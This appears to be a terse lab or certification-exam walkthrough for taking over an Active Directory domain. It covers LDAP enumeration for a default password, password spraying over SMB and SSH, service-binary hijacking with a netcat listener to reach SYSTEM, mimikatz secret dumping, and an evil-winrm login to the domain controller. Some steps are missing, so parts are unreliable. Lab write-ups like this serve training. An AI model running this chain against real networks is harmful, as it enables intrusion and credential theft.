Examsupports ONE
Examsupports ONE
192.168.xx.100 - DC01
192.168.xx.101 - MS02
192.168.xx.102 - MS01
192.168.xxx.100
Run nmap with ldap script for getting default password which is ESMWaterP1p3S!
kali@kali:$ sudo nmap -sCV -T4 -oA nmap/inital --script "ldap* and not
brute" 192.168.xxx.100
We will get some open ports 389 (ldap) will be one of them and using ldapsearch we will get
usernames list and We can also get Default Password Here
create new usernames.txt with all user which are found in ldapsearch
we will get usernames and password after running this query save in new file usernames.txt
# smb
kali@kali:$ sudo cme smb 192.168.xx.101 -u usernames.txt -p 'ESMWaterP1p3S!'
# ssh
kali@kali:$ sudo cme ssh 192.168.xx.102 -u usernames.txt -p 'ESMWaterP1p3S!'
192.168.xxx.102
# password - ESMWaterP1p3S!
kali@kali:$ ssh [email protected]
After running winpeas we will get "C:\Program Files\Pipes Printing Service\PipesPrinting.exe" and
we WriteData/CreateFiles permission on this directory
# Rename
PS C:\Users\ketty.agan\Desktop> move "C:\Program Files\Pipes Printing
Service\PipesPrinting.exe" temp.exe
9. Start nc listner
PS C:\Users\ketty.agan\Desktop> shutdown /r
after that we will get system shell on box now we can use mimikatz.exe for Dumping Passwords
Post Exploitation
PS C:\Users\Public> mimikatz.exe
token::elevate
lsadump::secrets
192.168.xx.100
kali@kali:$ evil-winrm -i 192.168.xx.100 -u passcore -p 'G3x56wGq9fItu166'
And we have Compromised Full AD Domain... Here you can read last proof.txt